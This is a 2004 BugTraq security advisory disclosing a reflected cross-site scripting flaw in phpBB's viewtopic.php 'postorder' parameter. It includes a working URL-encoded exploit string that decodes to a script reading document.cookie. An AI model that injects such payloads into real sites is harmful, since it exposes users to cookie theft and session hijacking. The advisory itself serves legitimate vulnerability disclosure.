BugTraq
New phpBB ViewTopic.php Cross Site Scripting Vulnerability Feb 28 2004 03:09PM
Cheng Peng Su (apple_soup msn com) (1 replies)


################################################

Advisory Name:New phpBB ViewTopic.php Cross Site Scripting Vulnerability

Release Date: Feb 29,2004

Application: phpBB

Platform: PHP

Version Affected: the lastest version

Vendor URL: http://www.phpbb.com/

Discover: Cheng Peng Su(apple_soup_at_msn.com)

################################################

Details:

This vuln is similar to Arab VieruZ's advisory 'XSS bug in phpBB',this time the problem is not in 'highlight' ,but in 'postorder'.we can inject HTML code,such code could be used to steal cookie information.

Proof of Concept:

If there is a topic at

http://site/phpBB/viewtopic.php?t=123456

this page can be also viewed at

http://site/phpBB/viewtopic.php?t=123456&postorder=asc

then this page will contain code like below:

<a class="maintitle" href="viewtopic.php?t=176994&start=0&postdays=0&postorder=as
c&highlight=">[Topic Title]</a>.

phpBB doesn't filter out illegal characters from 'postorder',so we can inject HTML code after 'postorder='.

Exploit:

URL: http://site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%73%63%72%69
%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65
%29%3C%2F%73%63%72%69%70%74%3E%3C

note unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C') == '"><script>alert(document.cookie)</script><'

Contact:

Cheng Peng Su

apple_soup_at_msn.com

Class 1,Senior 2,High school attached to Wuhan University

Wuhan,Hubei,China

[ reply ]
Re: New phpBB ViewTopic.php Cross Site Scripting Vulnerability Mar 01 2004 11:35PM
t4c [Founder of GHCIF] (t4c ghcif de)


 

Privacy Statement
Copyright 2010, SecurityFocus